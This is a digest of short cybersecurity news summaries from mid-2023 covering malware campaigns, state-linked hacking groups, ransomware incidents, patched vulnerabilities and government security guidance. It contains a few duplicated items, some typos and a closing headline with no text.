Businesses operating in the Latin American (LATAM) region are the target of a new Windows-based banking trojan called TOITOIN since May 2023. ‘This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage,’ Zscaler researchers Niraj Shivtarkar and Preet Kamal said in a report published last week.

Charming Kitten Hackers Use New ‘NokNok’ Malware for macOS

Security researchers observed a new campaign they attribute to the Charming Kitten APT group where hackers used new NokNok malware that targets macOS systems. The campaign started in May and relies on a different infection chain than previously observed, with LNK files deploying the payloads instead of the typical malicious Word documents seen in past attacks from the group.

Apps with 1.5M installs on Google Play send your data to China

Security researchers discovered two malicious file management applications on Google Play with a collective installation count of over 1.5 million that collected excessive user data that goes well beyond what's needed to offer the promised functionality. The apps, both from the same publisher, can launch without any interaction from the user to steal sensitive data and send it to servers in China.

Google Releases Android Patch Update for 3 Actively Exploited Vulnerabilities

or the month of June, Google released 46 new software vulnerabilities, some of which were actively exploited in attacks in the wild. Among the vulnerabilities addressed is a memory leak flaw impacting the Arm Mali GPU driver for Bifrost, Avalon, and Valhall chips. Tracked as CVE-2023-26083, the bug was exploited in a previous attack that enabled spyware infiltration on Samsung devices in December 2022. Another serious vulnerability addressed is CVE-2021-29256 which relates to a high-severity issue impacting specific versions of the Bifrost and Midgard Arm Mali GPU kernel drivers.

Iranian Hacking Group Impersonating Nuclear Experts to Gain Intel From Western Think Tanks

Researchers at Proofpoint have revealed that a cyber espionage group associated with the Iranian government has been engaging in phishing attacks targeting Middle Eastern nuclear weapons experts by impersonating employees of think tanks. The group, known by various names such as TA453, Charming Kitten, or APT35, has a history of targeting government officials, politicians, think tanks, and critical infrastructure entities in the United States and Europe.

MOVEit Transfer Customers Warned to Patch New Critical Flaw

MOVEit Transfer, the software at the center of the recent massive spree of Clop ransomware breaches, has received an update that fixes a critical-severity SQL injection bug and two other less severe vulnerabilities. SQL injection vulnerabilities allow attackers to craft special queries to gain access to a database or tamper with it by executing code. For these attacks to be possible, the target application must suffer from a lack of appropriate input/output data sensitization.

International Police Arrest Head of Opera1er Cybercrime Gang

International law enforcement agencies have announced the arrest of the leader of a cybercriminal syndicate called Opera1er, responsible for over 30 successful cyberattacks targeting financial institutions, banks, mobile banking services, and telecommunications companies. The group, also known as Desktop-Group and NXSMS, was involved in various scams, including malware, phishing, and business email compromise, resulting in an estimated $30 million in stolen funds. Interpol, along with AFRIPOL, Group-IB, Direction de L'information et des Traces Technologiques, and the Orange CERT Coordination Center, led the operation named Nervone. The arrest took place in early June in Abidjan, Côte d'Ivoire, Mali. Group-IB, who had been tracking the Opera1er group since 2018, provided crucial intelligence that helped identify the leader's identity and potential location.

Over 130,000 Solar Energy Monitoring Systems Exposed Online

Researchers are raising concerns about the vulnerability of over 130,000 photovoltaic monitoring and diagnostic systems accessible through the public internet. This accessibility exposes them to potential attacks from hackers. These systems play a crucial role in remote performance monitoring, troubleshooting, optimizing system efficiency, and enabling the remote management of renewable energy production units.

Researchers Uncover New Linux Kernel 'StackRot' Privilege Escalation Vulnerability

Researchers at Peking University recently disclosed details of a new flaw in the Linux Kernel that could enable a threat actor to elevate privileges on a targeted host. Dubbed StackRot, the flaw is being tracked as CVE-2023-3269 and impacts Linux versions 6.1 through 6.4. According to security researcher Ruihan Li, “As StackRot is a Linux kernel vulnerability found in the memory management subsystem, it affects almost all kernel configurations and requires minimal capabilities to trigger…However, it should be noted that maple nodes are freed using RCU callbacks, delaying the actual memory deallocation until after the RCU grace period. Consequently, exploiting this vulnerability is considered challenging.”

Cisco Warns of Bug That Lets Attackers Break Traffic Encryption

Yesterday, Cisco released an advisory warning its customers of an unpatched vulnerability in the Cisco ACI Multi-Site CloudSec encryption feature of Cisco Nexus 9000 Series Fabric Switches in ACI mode that could be exploited by an unauthenticated remote attack to read or modify intersite encrypted traffic. Tracked as CVE-2023-20185, the flaw received a CVSS score of 7.4, indicating a high level of severity. According to Cisco, the vulnerability is due to an issue with the implementation of the ciphers that are used by the CloudSec encryption feature on affected switches.

Microsoft Investigates Outlook.com Bug Breaking Email Search

Microsoft is investigating an ongoing issue preventing Outlook[.]com users from searching their emails and triggering 401 exception errors. When searching, users see an error saying, "Sorry, something went wrong. Please try again later." "Our initial review of Outlook[.]com server logs, in parallel with HTTP Archive format (HAR) logs captured during an internal reproduction of impact, indicates 401 errors are occurring due to an exception when users attempt to perform the search," Microsoft says on the service health portal.

RedEnergy Stealer-as-a-Ransomware Employed in Attacks in the Wild

Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks against energy utilities, oil, gas, telecom, and machinery sectors. The malware has the capabilities to steal information from various Internet browsers, but can also support ransomware activities. In this recent campaign, threat actors are masquerading as fake web browser updates to lure victims into installing the malware.

Hackers Target European Government Entities in SmugX Campaign

Since December 2022, a Chinese threat actor has been conducting a phishing campaign referred to as SmugX, which specifically targets embassies and foreign affairs ministries in the UK, France, Sweden Czech Republic, Hungary, and Slovakia. Security researchers at Check Point, a cybersecurity company, conducted analysis of the attacks and identified similarities with previous activities carried out by APT groups known as Mustang Panda and RedDelta.

New Tool Exploits Microsoft Teams Bug to Send Malware to Users

A member of U.S. Navy's red team has published a tool called TeamsPhisher that leverages an unresolved security issue in Microsoft Teams to bypass restrictions for incoming files from users outside of a targeted organization, the so-called external tenants. The tool exploits a problem highlighted last month by Max Corbridge and Tom Ellson of UK-based security services company Jumpsec, who explained how an attacker could easily go around Microsoft Teams' file-sending restraints to deliver malware from an external account.

Mexico-Based Hacker Targets Global Banks with Android Malware

An e-crime actor of Mexican provenance has been linked to an Android mobile malware campaign targeting financial institutions globally, but with a specific focus on Spanish and Chilean banks, from June 2021 to April 2023. The activity is being attributed to an actor codenamed Neo_Net, according to security researcher Pol Thill.

Japan’s largest Port Stops Operations After Ransomware Attack

The Port of Nagoya, the largest and busiest port in Japan, has been targeted in a ransomware attack that currently impacts the operation of container terminals. The port accounts for roughly 10% of Japan's total trade volume. It operates 21 piers and 290 berths. It handles over two million containers and cargo tonnage of 165 million every year. The port is also used by the Toyota Motor Corporation, one of the world’s largest automakers, to export most of its cars.

BlackCat Uses Malvertising to Push Backdoor

The BlackCat ransomware-as-a-service group is developing a threat activity cluster by deploying malicious malware using chosen keywords on webpages of legitimate organizations. They engage in unauthorized activities within company networks using cloned webpages of legitimate applications like WinSCP and SpyBoy. These cybercriminals hijack keywords to display malicious ads and lure unsuspecting users into downloading malware, a technique known as malvertising.

Blackcat Ransomware Pushes Cobalt Strike via WinSCP Search Ads

The ALPHV ransomware group, also known as the BlackCat, is engaging in malvertising activities to trick individuals into visiting counterfeit websites that closely resemble the legitimate WinSCP file-transfer application for Windows. However, these deceptive pages distribute installers infected with malicious software. WinSCP, a widely-used application for secure file transfer on Windows, is an open-source client and file manager supporting SFTP, FTP, S3, and SCP protocols. It boasts a significant user base, with approximately 400,000 weekly downloads from SourceForge alone. The BlackCat group is leveraging the WinSCP program as bait to potentially infiltrate the computers of system administrators, web administrators, and IT professionals, aiming to gain initial entry into valuable corporate networks.

New Windows Meduza Stealer Targets Tens of Crypto Wallets and Password Managers

A newly discovered information-stealing malware known as Meduza Stealer has been identified by researchers. The creators of this malware utilize advanced marketing tactics to promote its distribution. Meduza Stealer is designed to extract various browser-related data, such as login credentials, browsing history, and bookmarks, thereby compromising the victim’s browsing activities. Additionally, the malware targets specific extensions related to cryptocurrency wallets, password managers, and two-factor authentication (2FA). The authors of Meduza Stealer actively work on developing the malware in order to evade detection. However, no specific attacks have been attributed to this malware as of now.

TSMC Denies LockBit Hack as Ransomware Gang Demands $70 Million

Chipmaking giant TSMC (Taiwan Semiconductor Manufacturing Company) denied being hacked after the LockBit ransomware gang demanded $70 million not to release stolen data. TSMC is one of the world's largest semiconductor manufacturers, with its products used in a wide variety of devices, including smartphones, high performance computing, IoT devices, automotive, and digital consumer electronics/

300,000+ Fortinet Firewalls Vulnerable to Critical FortiOS RCE Bug

Hundreds of thousands of FortiGate firewalls are vulnerable to a critical security issue identified as CVE-2023-27997, almost a month after Fortinet released an update that addresses the problem. The vulnerability is a remote code execution with a severity score of 9.8 out of 10 resulting from a heap-based buffer overflow problem in FortiOS, the operating system that connects all Fortinet networking components to integrate them in the vendor's Security Fabric platform.

Experts Detected a New Variant of North Korea-Linked RUSTBUCKET macOS Malware

Researchers from Elastic Security Labs have discovered a new variant of the RustBucket Apple macOS malware. In April, the security firm Jamf observed the North Korea-linked BlueNoroff APT group using this new malware. BlueNoroff operates under the control of the notorious Lazarus APT group, also linked to North Korea. The RustBucket malware enables the operators to download and execute different payloads. The attribution to BlueNoroff APT is based on similarities found in Kaspersky's analysis.

MITRE Unveils Top 25 Most Dangerous Software Weaknesses of 2023: Are You at Risk?

MITRE recently published its list of the top 25 most dangerous software weaknesses for 2023. Every year, this list is calculated by analyzing public vulnerability data in the National Vulnerability Database for root cause mappings to CWE weaknesses for the previous two years. In total, 43,996 CVE entries were examined, with a score being assigned to each entry based on the prevalence and severity of the flaw.

Cybercriminals Hijacking Vulnerable SSH Servers in New Proxyjacking Campaign

An active financially motivated campaign is targeting vulnerable SSH servers to covertly ensnare them into a proxy network. ‘This is an active campaign in which the attacker leverages SSH for remote access, running malicious scripts that stealthily enlist victim servers into a peer-to-peer (P2P) proxy network, such as Peer2Profit or Honeygain,’ Akamai researcher Allen West said in a Thursday report. Unlike cryptojacking, in which a compromised system's resources are used to illicitly mine cryptocurrency, proxyjacking offers the ability for threat actors to leverage the victim's unused bandwidth to covertly run different services as a P2P node.

New EarlyRAT Malware Linked to North Korean Andariel Hacking Group

Security analysts have discovered a previously undocumented remote access trojan (RAT) named 'EarlyRAT,' used by Andariel, a sub-group of the Lazarus North Korean state-sponsored hacking group. Andariel (aka Stonefly) is believed to be part of the Lazarus hacking group known for employing the DTrack modular backdoor to collect information from compromised systems, such as browsing history, typed data (keylogging), screenshots, running processes, and more

Clop's MOVEit Campaign Affects Over 16 Million Individuals

The victims of the Clop ransomware group's supply chain attack include a wide range of organizations, such as healthcare software firm Vitality Group International, Talcott Resolution Life Insurance Company, and several universities including Georgia, Johns Hopkins, Missouri, Rochester, and Southern Illinois. Government departments like the U.S. Department of Energy, Department of Agriculture, and Office of Personnel Management were also targeted.

Manifest Confusion Threat Undermines Trust in Entire NPM Registry

The lack of metadata validation in the npm registry, which is widely used by developers to download Javascript code, has raised concerns about potential cyber threats. Despite being the largest software registry globally, with 17 million developers relying on it, the registry fails to perform checks on package metadata.

Critical Security Flaw in Social Login Plugin for WordPress Exposes Users' Accounts

Wordfence recently disclosed a critical flaw in miniOrange's Social Login and Register plugin for WordPress, which could be leveraged by a malicious threat actor to access any account on websites running the vulnerable plugin. Tracked as CVE-2023-2982 (CVSS score: 9.8), the flaw has been described as an authentication bypass flaw and impacts all versions of the plugin, including and prior to 7.6.4.

Linux version of Akira ransomware targets VMware ESXi servers

Operators behind the Akira Ransomware have released a new Linux variant that is capable of encrypting VMware ESXi virtual machines. The Linux variant was discovered by malware analyst rivitna, who shared a sample of the new encryptor on VirusTotal last week. According to analysts, Linux encryptor shows it has a project name of 'Esxi_Build_Esxi6,’ indicating that is specially designed to target VMware ESXi servers.

Microsoft Fixes Windows Bug Causing File Explorer Freezes

Microsoft has resolved a Windows bug that was causing freezes in the File Explorer application. The issue primarily affected non-consumer environments and was observed in Windows 11 21H2/22H2 and Windows Server 2022. Users experienced freezes in File Explorer after installing Windows updates released since May 9th, 2023. Microsoft released an optional cumulative update (KB5027303) this month to address the issue for Windows 11 22H2 users, with a plan to make it available to all affected Windows users in the July Patch Tuesday cumulative updates.

CISA and NSA Help Organizations Defend Their CI/CD Environments

The Cybersecurity and Infrastructure Security Agency (CISA) and National Security Agency (NSA) published a joint Cybersecurity Information Sheet (CSI) titled, “Defending Continuous Integration/Continuous Delivery Environment,” which can help organizations improve their defenses in cloud implementations of development, security, and operations (DevSecOps). Specifically, this joint guide explains how to integrate security best practices into typical software development and operations (DevOps) CI/CD environments, without regard for the specific tools being adapted.

CryptosLabs Scam Ring Targets French-Speaking Investors, Rakes in €480 Million

Group-IB recently uncovered the operations of a scam ring dubbed CryptoLabs that has allegedly made €480 million in illegal profits by targeting users in French-speaking individuals in France, Belgium, and Luxembourg since April 2018. The syndicate is known for impersonating well-known banks, fin-techs, asset management firms, and crypto platforms, setting up scam infrastructure spanning over 350 domains hosted on more than 80 servers. According to researchers, the threat actors have been experimenting with different landing pages, since 2015, ultimately launching their campaign around June 2018.

8Base Ransomware Spikes in Activity, Threatens U.S. and Brazilian Businesses

A ransomware threat called **8Base** that has been operating under the radar for over a year has been attributed to a ‘massive spike in activity’ in May and June 2023. ‘The group utilizes encryption paired with 'name-and-shame' techniques to compel their victims to pay their ransoms,’ VMware Carbon Black researchers Deborah Snyder and Fae Carlisle [said](https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player) in a report. ‘8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries.’

EncroChat Bust Leads to 6,558 Criminals' Arrests and €900 Million Seizure

On Tuesday, Europol announced that the takedown of EncroChat in July 2020 led to 6,558 arrests worldwide and the seizure of €900 million in illicit criminal proceeds. The operation was carried out by French and Dutch authorities which intercepted and analyzed over 115 million conversations made between approximately 60,000 users using the encrypted messaging platform.

Newly Surfaced ThirdEye Infostealer Targeting Windows Devices

Researchers have recently detected a new info stealer known as ThirdEye, which exhibits various variants, all designed to target and steal victims’ data. During a preliminary analysis, FortiGuard Labs came across this highly malicious yet, relatively unsophisticated info stealer while examining suspicious files. The researchers, became suspicious after encountering a Russian archive file translated to “time sheet” in English.

Hundreds of Devices Found Violating New CISA Federal Agency Directive

Censys researchers have discovered hundreds of Internet-exposed devices on the networks of U.S. federal agencies that have to be secured according to a recently issued CISA Binding Operational Directive. An analysis of the attack surfaces of more than 50 Federal Civilian Executive Branch (FCEB) organizations led to the discovery of more than 13,000 individual hosts exposed to Internet access, distributed across over 100 systems linked to FCEB agencies.

Anatsa Android Trojan Now Steals Banking Info From Users in US, UK

Researchers at ThreatFabric recently disclosed details of a new mobile campaign that has been pushing Anatsa, an Android banking trojan, to online banking customers in the U.S., the U.K., Germany, Austria, and Switzerland since March 2023. The malware is being distributed via the Play Store by masquerading as PDF viewer and editor apps and office suites, having over 30,000 installations in the last couple of months. Although ThreatFabric reported the malicious applications to Google, which ended up removing them altogether from the play store, the attackers were observed uploading new malware samples soon after under the guise of other applications.

New PindOS Javascript Dropper Deploys Bumblebee, Icedid Malware

Researchers have identified a novel malicious tool reffered to as PindOS. This tool acts as a delivery mechanism for the Bumblebee and IcedID malware, which are commonly associated with ransomware attacks. PindOS operates as a JavaScript malware dropper, seemingly designed with the sole purpose of retrieving subsequent-stage payloads that ultimately deliver the perpetrators’ final malicious payload.

CISA Releases Cloud Services Guidance and Resources

The Secure Cloud Business Applications (SCuBA) project provides guidance and capabilities to secure agencies’ cloud business application environments and protect federal information that is created, accessed, shared and stored in those environments. SCuBA will help secure federal civilian executive branch (FCEB) information assets stored within cloud environments through consistent, effective, modern, and manageable security configurations.

New Mockingjay Process Injection Technique Evades EDR Detection

A new process injection technique called "Mockingjay" has been discovered by researchers at cybersecurity firm Security Joes. This technique allows threat actors to bypass EDR (Endpoint Detection and Response) systems and execute malicious code on compromised systems without detection. Unlike traditional process injection methods, Mockingjay does not rely on commonly abused Windows API calls, special permissions, or memory allocation, making it more difficult to detect.

American Airlines, Southwest Airlines Disclose Data Breaches Affecting Pilots

American Airlines and Southwest Airlines, two of the largest airlines in the world, recently experienced data breaches caused by the hack of a third-party vendor called Pilot Credentials. The breach occurred on April 30, and both airlines were informed on May 3. The unauthorized individual gained access to Pilot Credentials' systems and stole documents containing information provided by pilot and cadet applicants. American Airlines reported that the breach affected 5,745 pilots and applicants, while Southwest reported a total of 3,009. The stolen information included personal details such as names, Social Security numbers, driver's license numbers, passport numbers, and more. Both airlines have terminated their relationship with the vendor and are directing applicants to self-managed internal portals. They have also notified law enforcement and are cooperating with investigations.

MOVEIt Breach Impacts Genworth, Calpers as Data for 3.2 Million Exposed

PBI Research Services has experienced a data breach, resulting in the disclosure of sensitive information for approximately 4.75 million individuals. This breach occured during the recent series of data-theft attacks targeting MOVEit Transfer. The attacks, initiated by the Clop ransomware gang, commenced on May 27th, 2023. Exploiting a previously unknown vulnerability in MOVEit Transfer, the gang proceeded to extract data from nemerious companies, including PBI and its three clients. In recent days, the Clop gang has adopted an extortion strategy gradually revealing the names of affected organizations on their data leak site. The tactic aims to exert pressure on victims, compelling them to meet the gang's ransom demands.

Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers

In a series of Twitter posts last week, Microsoft stated that it has observed an uptick in credential-stealing attacks from Midnight Blizzard (aka Nobelium, APT29, Cozy Bear, Iron Hemlock, and The Dukes), a notorious Russian state-affiliated hacker group that was behind the 2020 SolarWinds attack. The latest intrusions are using a variety of password spray, brute force, and token theft techniques, with the group also conducting session replay attacks to gain initial access to cloud resources leveraging stolen sessions. Targets highlighted by Microsoft include governments, IT service providers, NGOs, the defense industry, and critical manufacturing.

China-linked APT Group VANGUARD PANDA Uses a New Tradecraft in Recent Attacks

CrowdStrike researchers observed the China-linked APT group VANGUARD PANDA, aka Volt Typhoon, using a novel tradecraft to gain initial access to target networks. The Volt Typhoon group has been active since at least mid-2021 it carried out cyber operations against critical infrastructure. In the most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors.

Suncor Energy Cyberattack Impacts Petro-Canada Gas Stations

Over the weekend, Suncor, one of Canada’s largest synthetic crude producers, disclosed it suffered from a cyberattack, stating that it is working on resolving the incident and that some transactions with customers and suppliers may have been impacted. Although no additional details were reported in Suncor’s notice, Petro-Canada, a subsidiary of Suncor that operates 1,500 gas stations across Canada, stated it is facing technical issues, preventing customers from paying with credit cards or rewards points. According to a post on Twitter, the company warned customers that they cannot currently log in to their accounts via the app or website and apologized for the inconvenience caused. This outage also prevents earning points when refueling at the company's gas stations.

China-linked APT Group VANGUARD PANDA Uses a New Tradecraft in Recent Attacks

CrowdStrike researchers observed the China-linked APT group VANGUARD PANDA, aka Volt Typhoon, using a novel tradecraft to gain initial access to target networks. The Volt Typhoon group has been active since at least mid-2021 it carried out cyber operations against critical infrastructure. In the most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors.

Mirai Botnet Targets 22 Flaws in D-Link, Zyxel, Netgear Devices

Researchers from Palo Alto Networks’ Unit 42 have detected a modified version of the Mirai botnet, which is actively exploiting nearly 20 vulnerabilities. The primary objective of this botnet is to compromise devices manufactured by D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek. These compromised devices are then utilized to launch distributed of denial of service attacks (DDoS) attacks.

Powerful JavaScript Dropper PindOS Distributes Bumblebee and IcedID Malware

Cybersecurity firm Deep Instinct has uncovered a new JavaScript dropper, dubbed PindOS, that is being used to deliver next-stage payloads like BumbleBee and IceID, both of which are loaders that have also been leveraged to deploy other malware on hosts, including ransomware. “Bumblebee, notably, is a replacement for another loader called BazarLoader, which has been attributed to the now-defunct TrickBot and Conti groups. A report from Secureworks in April 2022 found evidence of collaboration between several actors in the Russian cybercrime ecosystem, including that of Conti, Emotet, and IcedID.

IDOR in Microsoft Teams Allows for External Tenants to Introduce Malware

Security researchers from Jumpsec have discovered a vulnerability in Microsoft Teams that enables attackers to deliver malware directly to employees' inboxes. The bug allows external users to send malicious payloads that appear as downloadable files. By combining this vulnerability with social engineering tactics, attackers can increase the success rate of their attacks. This method bypasses anti-phishing security controls and takes advantage of the trust employees have in messages received through Microsoft Teams. This vulnerability affects every organization using Teams in the default configuration.

RedEyes Group Wiretapping Individuals

“RedEyes, a state-sponsored APT group also known as APT37, ScarCruft, and Reaper, has been identified as targeting individuals such as North Korean defectors, human rights activists, and university professors. Their objective is to monitor the lives of specific individuals. In May 2023, AhnLab Security Emergency response Center (ASEC) discovered RedEyes distributing and utilizing an Infostealer with wiretapping capabilities and a GoLang-based backdoor that exploits the Ably platform. The backdoor allowed the threat actor to send commands through the Ably service, with the API key value required for communication stored in a GitHub repository. This key value allowed anyone with knowledge of it to subscribe to the threat actor's channel”

404 TDS Phishing Campaign: Truebot, FlawedGrace, and Cobalt Strike Intrusion Revealed

During the DFIR investigation conducted in May 2023, a significant intrusion was observed, involving the deployment of Truebot, Cobalt Strike, FlawedGrace (also known as GraceWire & BARBWIRE), and the subsequent deployment of the MBR Killer wiper. The threat actors executed their attack swiftly, successfully exfiltrating data and rendering numerous systems inoperable with the wiper within a span of 29 hours after gaining initial access.

Critical Flaw Found in WordPress Plugin for WooCommerce Used by 30,000 Websites

A critical security flaw has been disclosed in the WordPress "Abandoned Cart Lite for WooCommerce" plugin that's installed on more than 30,000 websites. ‘This vulnerability makes it possible for an attacker to gain access to the accounts of users who have abandoned their carts, who are typically customers but can extend to other high-level users when the right conditions are met,’ Defiant's Wordfence said in an advisory. Tracked as CVE-2023-2986, the shortcoming has been rated 9.8 out of 10 for severity on the CVSS scoring system.

UPS Discloses Data Breach After Exposed Customer Info Used in SMS Phishing

Multinational company UPS is notifying customers in Canada that certain personal details could have been compromised through its online package tracking tools, potentially leading to their misuse in phishing attempts. The communication sent by UPS Canada titled “An Update from UPS: Combatting Phishing and Smishing,” appears to be initially aimed at cautioning customers about the risk associated with phishing. However, the communication is, in fact, a notification of a data breach. UPS Canada discreetly includes a disclosure within the message, revealing that they have been receiving reports of SMS phishing messages containing recipients’ names and address information.

Apple Fixes Zero-Days Used to Deploy Triangulation Spyware Via iMessage

Apple recently addressed three zero-day vulnerabilities that were exploited in attacks to install spyware on iPhones via iMessage zero-click exploits. Below is a list of the CVEs:

  • CVE-2023-32434: A kernel integer overflow was addressed with improved input validation
  • CVE-2023-32435: A memory corruption issue in Apple WebKit was addressed with improved state management.
  • CVE-2023-32439: A type confusion issue in WebKit was addressed with improved checks.

    The first two flaws were uncovered by researchers at Kaspersky, Georgy Kucherin, Leonid Bezvershenko, and Boris Larin. According to Kaspersky, the vulnerabilities have been exploited in an ongoing campaign dubbed Operation Triangulation, which has been active since 2019.

  • APT37 Hackers Deploy New FadeStealer Eavesdropping Malware

    The North Korean APT37 hacking group, also known as StarCruft, Reaper, or RedEyes, has recently deployed a new information-stealing malware called "FadeStealer." This malware includes a wiretapping feature, allowing the threat actors to eavesdrop and record from victims' microphones. APT37 has a history of conducting cyber espionage attacks aligned with North Korean interests, targeting North Korean defectors, educational institutions, and EU-based organizations.

    Exploit Released for Cisco AnyConnect Bug Giving SYSTEM Privileges

    A proof-of-concept exploit code has been released for a high-severity vulnerability in Cisco Secure Client Software for Windows, previously known as AnyConnect Secure Mobility Client. This flaw, tracked as CVE-2023-20178, allows authenticated attackers to escalate privileges to the SYSTEM account, which is used by the Windows operating system. The vulnerability can be exploited without user interaction and takes advantage of a specific function in the Windows installer process.

    New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks

    A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez. ‘The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code,’ security researchers Joie Salvio and Roy Tay said.

    Zyxel Warns of Critical Command Injection Flaw in NAS Devices

    Zxyel recently published security updates to address a critical command injection vulnerability impacting its Network Attached Storage (NAS) devices, warning customers to update their firmware. Tracked as CVE-2023-27992, the vulnerability is due to a pre-authentication command injection problem that could enable an unauthenticated attacker to execute operating system commands on the impacted device via specially crafted HTTP requests.

    Hackers Infect Linux SSH Servers With Tsunami Botnet Malware

    An unidentified malicious entity is employing brute-force techniques to gain unauthorized access to Linux SSH servers, enabling the installation of various forms of malicious software. The malware includes the Tsunami DDoS bot, ShellBot, log cleaners, tools for privilege escalation, and an XMRig coin miner designed to mine Monero. SSH (Secure Socket Shell) is a secure and encrypted network communication protocol used for remote administration of Linux devices. It facilitates activities such as executing commands, modifying configurations, updating software, and resolving issues for network administrators.

    3CX Data Exposed, Third-Party to Blame

    3CX, a popular Voice over Internet Protocol (VoIP) comms provider, was exposed due to the negligence of a third-party vendor. The vendor's open server left instances of Elasticsearch and Kibana vulnerable, leading to the discovery of the exposed data on May 15th. This discovery came to light nearly two months after the initial cyberattacks on 3CX, which had previously been targeted by North Korean hackers. The exposed data included call metadata, license keys, and encoded database strings, posing significant risks.

    Clop Ransomware and the MOVEit Cyberattack: What to Know

    The recent Clop ransomware attack targeted the MOVEit Transfer file-transfer platform, resulting in compromised networks worldwide. The attack exploited a vulnerability in the Managed File Transfer (MFT) application using a structured query language (SQL) attack vector. The compromised platforms contained sensitive data, potentially exposing a wide range of sensitive customer information from various industries and geographies. Affected entities included U.S. government agencies, airlines, media companies, an oil giant, health services, and international consulting firms.

    New RDStealer Malware Steals From Drives Shared Over Remote Desktop

    Bitdefender Labs has discovered a cyberespionage and hacking campaign called 'RedClouds' that utilizes custom malware known as 'RDStealer' to automatically steal data from drives shared through Remote Desktop connections. The campaign has been active since at least 2020, primarily targeting systems in East Asia. While the specific threat actors behind RedClouds have not been identified, Bitdefender suggests that their interests align with China and that they possess the sophistication of a state-sponsored Advanced Persistent Threat (APT) group.

    Chinese APT15 Hackers Resurface with New Graphican Malware

    Today, the Threat Hunter Team at Symantec, part of Broadcom, reports that APT15's latest campaign targets foreign affairs ministries in Central and South American countries. The researchers report that the new Graphican backdoor is an evolution of an older malware used by the hackers rather than a tool created from scratch. It is notable for using Microsoft Graph API and OneDrive to stealthily obtain its command and control (C2) infrastructure addresses in encrypted form, giving it versatility and resistance against take-downs.

    Iowa’s Largest School District Confirms Ransomware Attack, Data Theft

    Des Moines Public Schools, Iowa's largest school district, confirmed today that a ransomware attack was behind an incident that forced it to take all networked systems offline on January 9, 2023. While the school district also received a ransom demand following the attack from an unnamed ransomware group, the ransom has not been paid. Almost 6,700 individuals whose data was affected in the resulting data breach will be contacted this week with details regarding what personal information was exposed.

    Russian APT28 Hackers Breach Ukrainian Govt Email Servers

    A cyber-espionage group known as APT28, which is associated with Russia's General Staff Main Intelligence Directorate (GRU), has successfully infiltrated Roundcube email servers belonging to various Ukrainian organizations, including government entities. This threat group, also identified as BlueDelta, Fancy Bear, Sednit, and Sofacy, took advantage of the ongoing Russia-Ukraine conflict to deceive recipients.

    ASUS Urges Customers to Patch Critical Router Vulnerabilities

    Yesterday, ASUS released firmware updates to address vulnerabilities impacting several of its router models, warning customers to update their devices or restrict WAN access until they’re secure. In total, 9 vulnerabilities were addressed, some of which have been rated high and critical in severity. Most severe of the flaws include CVE-2022-26376 and CVE-2018-1160, which have both received a 9.8 score out of 10 on the CVSS scale. CVE-2022-26376 relates to a critical memory corruption weakness in the Asuswrt firmware used in Asus routers. Successful exploitation of this flaw could enable a threat actor to trigger a denial of service or gain code execution.

    Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities

    The threat actors behind the Vidar malware have made changes to their backend infrastructure, indicating attempts to retool and conceal their online trail in response to public disclosures about their modus operandi. ‘Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia,’ cybersecurity company Team Cymru said in a new analysis shared with The Hacker News. Vidar is a commercial information stealer that's known to be active since late 2018. It's also a fork of another stealer malware called Arkei and is offered for sale between $130 and $750 depending on the subscription tier. Typically delivered through phishing campaigns and sites advertising cracked software, the malware comes with a wide range of capabilities to harvest sensitive information from infected hosts.

    MOVEit Transfer Customers Warned of New Flaw as PoC Info Surfaces

    On Thursday, Progress software disclosed yet another vulnerability in its MOVEit Transfer application, making this the third vulnerability the company has addressed since May 2023. Similar to the previous flaws (CVE-2023-34362 (May 31, 2023) & CVE-2023-35036 (June 9, 2023)), the latest vulnerability (CVE-2023-35708 (June 15, 2023)) also relates to a case of SQLi injection and could allow threat actors to escalate privileges and potentially gain unauthorized access to MOVEit Transfer’s database.

    Rhysida Ransomware Leaks Documents Stolen From Chilean Army

    The group responsible for a recent ransomware operation named Rhysida has released online a set of documents they claim were stolen from the network of the Chilean Army (Ejército de Chile). After confirming a security incident on May 29, where their systems were compromised over the weekend of May 27, the Chilean Army took immediate action by isolating the network. Military security experts have begun the process of restoring the affected systems. The incident was promptly reported to Chile's Computer Security Incident Response Team (CSIRT), which operates under the Joint Chiefs of Staff and the Ministry of National Defense. Shortly after the disclosure of the attack, local media reported the arrest and charges filed against an Army corporal in connection with the ransomware attack.

    CISA and NSA Publish BMC Hardening Guidelines

    The US Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) have released joint guidance on hardening Baseboard Management Controllers (BMCs). Published this week, the document aims to address the overlooked vulnerabilities in BMCs, which can serve as potential entry points for malicious actors seeking to compromise critical infrastructure systems.

    Suspected LockBit Ransomware Affiliate Arrested, Charged in US

    Ruslan Magomedovich Astamirov, a 20-year-old Russian national from the Chechen Republic, has been arrested in Arizona and charged by the U.S. Justice Department for his alleged involvement in deploying LockBit ransomware on the networks of victims in the United States and abroad. According to the criminal complaint, Astamirov participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud, intentionally damage protected computers, and make ransom demands through the use of ransomware.

    Barracuda ESG Zero-Day Attacks Linked to Suspected Chinese Hackers

